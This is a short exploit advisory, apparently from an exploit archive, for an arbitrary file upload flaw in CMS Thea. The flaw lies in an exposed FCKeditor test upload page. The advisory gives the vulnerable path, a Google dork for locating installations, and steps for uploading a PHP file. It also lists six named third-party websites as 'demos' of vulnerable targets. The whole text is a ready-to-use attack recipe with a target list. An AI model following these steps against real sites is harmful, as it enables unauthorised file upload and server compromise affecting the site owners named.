[+] CMS Thea (fckeditor) Arbitrary File Upload Vulnerability [+] Exploit Title : CMS Thea (FCKEDITOR) [+] Exploit Author : Ashiyane Digital Security Team [+] Vendor Homepage : http://cpu-zeto.pl [+] Google Dork : Designed by C.P.U. ZETO w Jeleniej Górze [+] Date: 2015-04-23 [+] Tested On : Windows 7 / Mozilla Firefox [+] Version : All Version [+] exploit => js/fckeditor/editor/filemanager/connectors/uploadtest.html [+] first go to => http://site.com/[path] [+] then => http://www.site.com/[path]/js/fckeditor/editor/filemanager/connectors/uploadtest.html [+] select => Select the "File Uploader"> php ... upload to : Uploaded File URL: [+] demos : [+] http://getagilitXy.pl/js/fckeditor/editor/filemanager/connectors/uploadtest.html [+] http://techmur.Xpl/js/fckeditor/editor/filemanager/connectors/uploadtest.html [+] http://skzhoryXzont.pl/js/fckeditor/editor/filemanager/connectors/uploadtest.html [+] http://polarniXk.pl/js/fckeditor/editor/filemanager/connectors/uploadtest.html [+] http://jarex-Xtrans.com.pl/js/fckeditor/editor/filemanager/connectors/uploadtest.html [+] http://koralXowasciezka.pl/js/fckeditor/editor/filemanager/connectors/uploadtest.html [+][+][+][+][+][+][+][+][+][+][+] [+]Discovered By : Cyb3r_Dr4in[+] [+][+][+][+][+][+][+][+][+][+][+]